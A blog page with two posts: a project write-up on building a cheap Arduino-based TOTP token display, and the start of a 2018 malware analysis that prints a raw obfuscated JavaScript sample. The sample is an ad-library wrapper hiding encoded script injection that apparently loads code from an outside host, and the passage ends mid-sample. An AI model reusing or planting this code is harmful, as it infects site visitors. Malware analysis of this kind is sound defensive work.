Saturday, March 26, 2022

A Token Post

First, a little bit of catch-up

It's been a little while since I wrote anything for this blog. I've had another entry sitting in draft phase for several years, on the topic of automating wireless traffic interception with evil twin access points, but I never quite finished developing the tool that I intended to announce with the post. Ah well, such is life.

Fast-forward to now, and I've managed to launch a successful career in information security, first on the defensive side and now on the offensive. As we've all been muddling our way through a global pandemic, I picked up an interest in hardware hacking, microcontroller programming, and PCB design. I started with a headlong dive into a nearly-abandoned project for BSides CT 2020 and, although I can't say I was successful at rescuing it, I certainly learned a great deal and it whetted my appetite for more.

Over the last two and a half years, I've been playing with Arduino kits, ATtiny chips, and a variety of development boards to hone my hardware skills. I've put together a fun challenge badge for BSides CT 2022 (whenever it actually happens) that I hope to write more about later on. In the meantime, however, I've been focusing on a smaller project - a simple DIY TOTP generator. This blog post will walk through the development process and provide all the code and components you need to build and run one yourself, if you are so inclined.

Project goals

I had one motivation for this project: to avoid picking up my phone every time I needed to run SSH.

My daily "workstation" (read: attack host) is a Kali instance hosted in the AWS cloud. I connect to it via SSH and use Google Authenticator for MFA, but since Authenticator doesn't do push notifications, I'm left wasting precious seconds throughout the day picking up my phone, signing in with my thumbprint, opening the MFA app, and tapping the right profile to get the all-powerful six-digit code.

How much simpler would life be if that code was right in front of me at all times, so all I had to do was glance at it rather than interact with it in any way? If you're reading this thinking, "So...your one motivation is that you're lazy?," I simply cock my eyebrow in tacit acknowledgement.

I decided that, as a stretch goal, I would see if there was an elegant way to show additional codes - again without any interaction, because that would defeat goal #1 above. And while we're at it, let's set an arbitrary financial goal as well, because let's face it, I could just buy a Yubikey for about $40 if I really wanted to. But I don't want to, I want to build my own for...hmm...under $20.

So, to recap, my goal was to build a small, always-on device that would produce a valid MFA token with:

  1. Zero interaction
  2. Support for multiple tokens (as long as it doesn't contradict goal #1)
  3. Total cost <$20

Some background

The first task was to do some research and learn how MFA tokens are generated. Fortunately, a lot has been written online about this topic, so it was pretty easy to grasp the basics. Twilio, for example, has a great, easy-to-read primer on the subject. Here's the important stuff:

TOTP stands for Time-based One-Time Passwords and is a common form of two factor authentication (2FA). Unique numeric passwords are generated with a standardized algorithm that uses the current time as an input. The time-based passwords are available offline and provide user friendly, increased account security when used as a second factor.

TOTP is also known as app based authentication, software tokens, or soft tokens. Authentication apps like Authy and Google Authenticator support the TOTP standard.

The TOTP algorithm follows an open standard documented in RFC 6238. The inputs include a shared secret key and the system time.

The inputs to the TOTP algorithm are device time and a stored secret key. Neither the inputs nor the calculation require internet connectivity to generate or verify a token. Therefore a user can access TOTP via an app like Authy while offline.

Great! So there's an existing standard, which meant I probably wouldn't have to reproduce the wheel, but instead could use existing libraries to do the heavy lifting. I would just need to choose the right hardware components and slap it together with (relatively) little effort.

Hardware components

Next, I put together a shopping list. I learned that there are three main components to a TOTP generator:

  • Microcontroller to store the keys, run the token generator code, and drive the other components
  • Real-time clock module to keep accurate time
  • Display module to show the token

For power, I decided USB would be appropriate since the device would always be near my computer anyhow. After comparing a variety of options for the above, I settled on the following components for small size and low cost:

Note that the links above are provided for reference only - getting to the target cost would require some bargain hunting and bulk purchasing.

Prototype assembly

Once I got my hands on the components, I wired them together on a breadboard to see what they could do. A key factor in choosing these specific components was that they all supported the I2C communications bus, which made wiring a simple exercise. I only needed to connect eight wires in total - four from the Nano to the RTC, and four from the Nano to the display. Since both of the external modules shared the same bus, I connected them in parallel. Here's how it looked on my breadboard:


Component testing

Next it was time to give the components a test! The Arduino made this part super easy - I just had to plug in the Nano to my laptop via USB, install the free Arduino app, install some libraries for the components, and try out the example scripts that came with those libraries.

First up was the display (because that's much cooler to play with than the RTC). I loaded the "Adafruit SSD1306" library, opened the "ssd1306_128x32_i2c" example script, deployed the code to the Nano, and lo and behold - I had a working display!

Next was the RTC module. For this one, I loaded the "RTC" library Manjunath CV, opened the "DS3231_Info" example script, deployed the code to the Nano, and opened the serial terminal to observe the output. Once again, it all worked pretty smoothly, although I confess I played with several libraries before settling on the one I liked best - some were decidedly easier to use than others.

Writing the program

Now I was finally able to dive into the fun part! I identified several problems I would have to solve in order to get a working product. Specifically, I would need to:

  • Give the Nano the key to my Google Authenticator profile (and store it somewhere)
  • Set the RTC to the correct time
  • Generate an accurate TOTP
  • Show the token on the display (and update it every 30 seconds)
  • Show some sort of countdown indicator on the display

I tackled these challenges haphazardly in no particular order, putting the pieces together as I was able to solve them (and making a lot of mistakes along the way), but for the sake of easy reading I'll skip the messy bits and summarize the solutions I found.

First, programming the key and syncing the clock both required external input, so I decided the easiest way to accomplish this was via the USB serial connection built into the Nano. I wrote a Python script to run on my laptop that would communicate with the Nano's program using a simple serial protocol. The Python program would open a serial connection, send the current time to the Nano, and then prompt the user for other actions like entering or changing the key. This worked pretty well! Although it took a lot of refining as I added additional functionality, serial communications proved to be a reliable way to exchange data between the two devices.

To store the key on the Nano (so it would only have to be programmed once from the laptop), I decided to use EEPROM. This is an area of memory that persists even when reprogramming the Nano, so it seemed an appropriate place to record sensitive information. To accomplish this, I installed the "EEPROM" library and used the built-in "EEPROM.put()" function to store the key.

To program the RTC, I used the "RTC" library along with "Wire" to handle the I2C communications. After receiving a Unix timestamp from the laptop via USB serial, I just had to set the RTC time like so:

static DS3231 rtc;
rtc.begin();
rtc.stopClock(); 
rtc.setEpoch(timestamp); 
rtc.startClock();

Now that I had a key and the accurate time, I could start generating TOTPs! I reviewed the available libraries for Arduino and decided to go with one named "TOTP library" by Luca Dentella. Using the library was straightforward - to generate a TOTP from the key and current time, all I had to do was this:

TOTP totp = TOTP(key, strlen(key));
char* code = totp.getCode(rtc.getEpoch());

For the display, I decided to use the "Adafruit GFX Library" library with "Adafruit SSD1306" to drive the hardware. I chose a couple of fonts that looked good on the display, played around with formatting until I had an appealing look, and learned how to draw lines so that I could make a progress bar that would tick down as the token was nearing expiration:


With all the pieces put together, I was able to compare the output from my TOTP generator to my phone app, and was pleased to find matching codes!

Enhancing functionality

At that point, I had a working proof-of-concept, so I was feeling pretty pleased with myself. I still had only satisfied one of my three goals, however, so I continued to refine the product.

Meeting the second goal (support for multiple tokens) proved to be a bigger challenge than I had originally expected. Since I needed to store multiple keys in EEPROM, and the keys could vary in length (according to the TOTP specification), I had to devise a data model and a more sophistocated way of reading, writing, and updating the memory. I decided to add a quality-of-life enhancement while I was at it - specifically, a label for each key to tell them apart. The data model ended up looking like this:

struct DataObj {
  uint16_t keyLen[2];
  uint8_t keyName[2][3];
  uint8_t key[2][64];
};

As you can see, each key has a label (up to three characters), a long integer storing the key length, and the key itself. I extended the Python program with some additional menu options:

# Show menu with other options
menu = [
    'Sync time',
    'List keys',
    'Add key',
    'Delete key',
    'Reset device',
    'Quit'
]

After considering various options for displaying multiple tokens, I decided to keep it simple:

  • If the user records one token, just display the TOTP for that token at full size
  • If the user records two tokens, display TOTPs for both tokens at the same time, with their labels

That said, the Arduino code can be modified to allow more keys to be stored, up to the EEPROM memory limit, but the display code would have to be modified to rotate through the extra tokens, since fitting more than two on the display would make them too small to read.

At this point, I started hitting the limits of the program memory on the Nano, and I had to make some choices to conserve space in my code. After several attempts to optimize the code, I realized that the biggest memory hog was the large font I had imported, so I replaced it with a scaled-up version of the smaller font, and was able to keep most of the other functionality I wanted.

Putting it all together

Now the project was almost complete - I just needed to do some bargain-hunting for the components to hit my price goal, and I needed something other than a breadboard to hold the components together in a neat little package. For this, I whipped out KiCad and sketched out a simple PCB design:


By positioning the RTC module on the back of the PCB and letting it stick out behind the Nano, I could keep the whole package compact and easy to mount underneath my monitor - perfect! I found a Chinese fabricator that could print 10 of the tiny boards for $5 (plus shipping), and I hunted down the best deals I could find for everything else:

  • 5pcs Emakefun Micro USB Nano Board - Amazon $23.31
  • 2pcs I2C OLED Display Module - Amazon $9.53
  • 2pcs DS3231 RTC - Amazon $12.77
  • 5pcs Carte Micro USB Nano Board - eBay $36.27
  • 8pcs I2C OLED Display Module - eBay $27.44
  • 8pcs Dorhea DS3231 RTC - Amazon $27.54
  • 10pcs custom PCBs - AllPCB $9.38
Grand total: $146.24

In the end, by ordering enough components to build 10 TOTP generators, I succeeded in getting the price per unit down to $15, beating my original goal! If you're interested in checking out the code for this project, or if you want to build one yourself, head over to my GitHub for complete instructions. Thanks for reading, as always!

Saturday, October 6, 2018

A Wolf in Fox's Clothing

A couple of weeks ago, a friend dropped me a sample of some malware that he encountered in his network (thanks @0daySimpson). It's written in javascript, and although most of it is pretty intelligible, there's a lovely section of obfuscated code that hides its intent very effectively. The challenge? Figure out what it does, of course! He asked for my assistance with analyzing the script, so that's just what I did. Here's how it went.

Step 1: Prettify the Code

When I first got my hands on the sample, it looked like this (WARNING: long block of code ahead!):
if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFObjectUtil=="undefined"){org.openx.SWFObjectUtil=new Object();}org.openx.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=org.openx.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new org.openx.PlayerVersion(_5.toString().split(".")));}this.installedVer=org.openx.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){org.openx.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};org.openx.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new org.openx.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};org.openx.SWFObjectUtil.getPlayerVersion=function(){var _23=new org.openx.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new org.openx.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new org.openx.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};org.openx.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};org.openx.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};org.openx.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};org.openx.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(org.openx.SWFObject.doPrepUnload){if(!org.openx.unloadSet){org.openx.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",org.openx.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",org.openx.SWFObjectUtil.prepUnload);org.openx.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=org.openx.util.getRequestParameter;var FlashObject=org.openx.SWFObject;var SWFObject=org.openx.SWFObject;document.mmm_fo=1;var OX_0f4f918e = '';
OX_0f4f918e += "<"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt-->\n";
OX_0f4f918e += "<"+"div id=\'ox_64ea63b5f76eb3c481ad44a961e2c479\' style=\'display: inline;\'><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+